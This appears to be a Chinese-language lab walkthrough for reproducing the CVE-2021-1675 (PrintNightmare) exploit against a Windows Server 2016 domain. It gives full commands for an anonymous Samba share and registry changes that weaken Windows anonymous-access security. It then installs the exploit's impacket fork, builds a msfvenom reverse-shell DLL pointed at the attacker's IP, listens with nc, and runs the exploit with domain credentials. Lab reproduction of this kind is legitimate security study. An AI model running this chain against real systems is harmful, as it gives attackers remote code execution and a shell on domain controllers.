一、環境配置
Windows Server 2016域環境(關閉Windows Defender)
ip1:192.168.110.184
ip2:192.168.13.135
kali(開啟samba匿名服務)
ip1:192.168.110.129
一個域用戶
二、搭建samba並開啟匿名共享
ps:公網中是不能搭建samba,似乎是運營商因為永恆之藍封掉了445端口
linux下(kali自帶):
apt-get install samba samba-common
vim /etc/samba/smb.conf
然后更改配置文件,內容如下:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes
重啟samba
service smbd restart
ps:path路徑為共享文件夾路徑
Windows下(本人未成功):
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'(powershell下運行不適合win7)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
三、在kali中安裝作者的impacket包
exp地址:https://github.com/cube0x0/CVE-2021-1675
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
四、關閉Windows Server 2016 windows Defender
傳送門:https://blog.csdn.net/weixin_43140049/article/details/106080625
五、在kali中生成惡意的dll並放入共享文件夾內
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f dll -o /usr/share2/shell.dll
六、在kali中建立監聽
注意:這里不要用handler監聽,要用nc監聽(具體原因不詳)
nc -lnvp 4444
七、執行exp
python3 CVE-2021-1675.py test.com/testadmin:qazWSX123@192.168.110.184 '\\192.168.110.129\smb\shell.dll'
八、說明
1、在windows中使用如上方式開啟匿名共享,但是exp執行失敗。
2、由於VPS無法開啟445端口,故而在linux機器開啟其他端口轉發到內網的445端口,同樣exp執行失敗。
3、該Exp在windows server 2012中執行失敗